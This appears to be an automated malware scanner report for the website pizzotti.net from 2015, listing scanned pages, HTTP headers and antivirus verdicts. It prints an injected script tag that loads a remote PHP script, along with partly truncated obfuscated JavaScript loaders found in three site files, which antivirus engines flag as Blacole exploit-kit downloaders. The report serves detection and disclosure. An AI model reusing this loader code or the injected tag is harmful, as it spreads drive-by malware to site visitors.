New scan:

Malware Scanner report for pizzotti.net

Malicious/Suspicious/Total urls checked
3/1/12
4 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "pizzotti.net" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=pizzotti.net

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://pizzotti.net/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 26 Feb 2015 15:21:15 GMT
Location: http://www.pizzotti.net/
Server: Apache
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
clean
http://www.pizzotti.net/
HTTP/1.1 200 OK
Date: Thu, 26 Feb 2015 15:21:16 GMT
Accept-Ranges: bytes
ETag: "4b1a33d35946d01:490e4d"
Server: Microsoft-IIS/6.0
Content-Length: 11255
Content-Location: http://www.pizzotti.net/index.htm
Content-Type: text/html
Last-Modified: Thu, 12 Feb 2015 00:21:20 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
clean
http://www.pizzotti.net/index.htm
200 OK
Content-Length: 11255
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=19579352"></script>

http://www.pizzotti.net/hp_subnavig.js
404 Not Found
Content-Length: 1635
Content-Type: text/html
clean
http://www.pizzotti.net/test404page.js
404 Not Found
Content-Length: 1635
Content-Type: text/html
clean
http://pizzotti.net/hp_gen_subnavig.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 26 Feb 2015 15:21:17 GMT
Location: http://www.pizzotti.net/hp_gen_subnavig.js
Server: Apache
Content-Length: 250
Content-Type: text/html; charset=iso-8859-1
clean
http://www.pizzotti.net/hp_gen_subnavig.js
200 OK
Content-Length: 6248
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)



vgyj=String;wfqd="spl"+"i"+"t";hzsz=window;qefi=(1)?"0x":"123";gnd=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(cgdjr){zel=false;try{}catch(lkr){zel=21;}if(1){kkjoat="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5cZq5eZq5f
... 3008 bytes are skipped ...
68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5cZq5eZq5fZq5fZq5aZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[wfqd]("Zq");}hzsz=kkjoat;atyb=[];for(jfftko=22-20-2;-jfftko+1419!=0;jfftko+=1){yqniv=jfftko;if((0x19==031))atyb+=vgyj.fromCharCode(eval(qefi+hzsz[1*yqniv])+0xa-gnd);}qvx=eval;if(Math.ceil(5.5)===6)qvx(atyb)}

Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ad-Aware
Trojan.Script.503932
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
Trojan.Script.503932
K7AntiVirus
Trojan ( 85a43f9d0 )
Comodo
TrojWare.JS.Kryptik.xt
Emsisoft
Trojan.Script.503932 (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Trojan-Downloader.JS.Iframe.dfe
MicroWorld-eScan
Trojan.Script.503932
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
Trojan.Script.503932
Commtouch
JS/IFrame.RS
BitDefender
Trojan.Script.503932

http://pizzotti.net/mouseover.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 26 Feb 2015 15:21:18 GMT
Location: http://www.pizzotti.net/mouseover.js
Server: Apache
Content-Length: 244
Content-Type: text/html; charset=iso-8859-1
clean
http://www.pizzotti.net/mouseover.js
200 OK
Content-Length: 6392
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)



vgyj=String;wfqd="spl"+"i"+"t";hzsz=window;qefi=(1)?"0x":"123";gnd=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(cgdjr){zel=false;try{}catch(lkr){zel=21;}if(1){kkjoat="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5cZq5eZq5f
... 3020 bytes are skipped ...
Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5cZq5eZq5fZq5fZq5aZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[wfqd]("Zq");}hzsz=kkjoat;atyb=[];for(jfftko=22-20-2;-jfftko+1419!=0;jfftko+=1){yqniv=jfftko;if((0x19==031))atyb+=vgyj.fromCharCode(eval(qefi+hzsz[1*yqniv])+0xa-gnd);}qvx=eval;if(Math.ceil(5.5)===6)qvx(atyb)}



Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ad-Aware
Trojan.Script.503932
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
Trojan.Script.503932
K7AntiVirus
Trojan ( 85a43f9d0 )
Comodo
TrojWare.JS.Kryptik.xt
Emsisoft
Trojan.Script.503932 (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Trojan-Downloader.JS.Iframe.dfe
MicroWorld-eScan
Trojan.Script.503932
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
Trojan.Script.503932
Commtouch
JS/IFrame.RS
BitDefender
Trojan.Script.503932

http://pizzotti.net/ml.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 26 Feb 2015 15:21:18 GMT
Location: http://www.pizzotti.net/ml.js
Server: Apache
Content-Length: 237
Content-Type: text/html; charset=iso-8859-1
clean
http://www.pizzotti.net/ml.js
200 OK
Content-Length: 6560
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function em_click(){
location.href="mailto:";
return true; }
function ml_write(){
document.write('');}
function ml_hp_write(){
document.write('<img title=""');}


vgyj=String;wfqd="spl"+"i"+"t";hzsz=win
... 3051 bytes are skipped ...
Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq5cZq5eZq5fZq5fZq5aZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[wfqd]("Zq");}hzsz=kkjoat;atyb=[];for(jfftko=22-20-2;-jfftko+1419!=0;jfftko+=1){yqniv=jfftko;if((0x19==031))atyb+=vgyj.fromCharCode(eval(qefi+hzsz[1*yqniv])+0xa-gnd);}qvx=eval;if(Math.ceil(5.5)===6)qvx(atyb)}



Antivirus reports:

AntiVir
JS/Quidvetis.A
Avast
JS:Decode-BLJ [Trj]
Ad-Aware
Trojan.Script.503932
Ikarus
Trojan-Downloader.JS.Iframe
Rising
JS:Trojan.Script.JS.Quidvetis.a!1612880
nProtect
Trojan.Script.503932
K7AntiVirus
Trojan ( 85a43f9d0 )
Comodo
TrojWare.JS.Kryptik.xt
Emsisoft
Trojan.Script.503932 (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
MicroWorld-eScan
Trojan.Script.503932
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Prot
JS/IFrame.RS
AVG
JS/Exploit
Norman
Quidvetis.A
GData
Trojan.Script.503932
Commtouch
JS/IFrame.RS
ESET-NOD32
JS/Kryptik.AOW
BitDefender
Trojan.Script.503932

http://adminsitebuilder.aruba.it/reseller_staging/1001/2.js
404 Not Found
Content-Length: 314
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: pizzotti.net

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 26 Feb 2015 15:21:15 GMT
Location: http://www.pizzotti.net/
Server: Apache
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1

...232 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: pizzotti.net
Referer: http://www.google.com/search?q=pizzotti.net

Result:
The result is similar to the first query. There are no suspicious redirects found.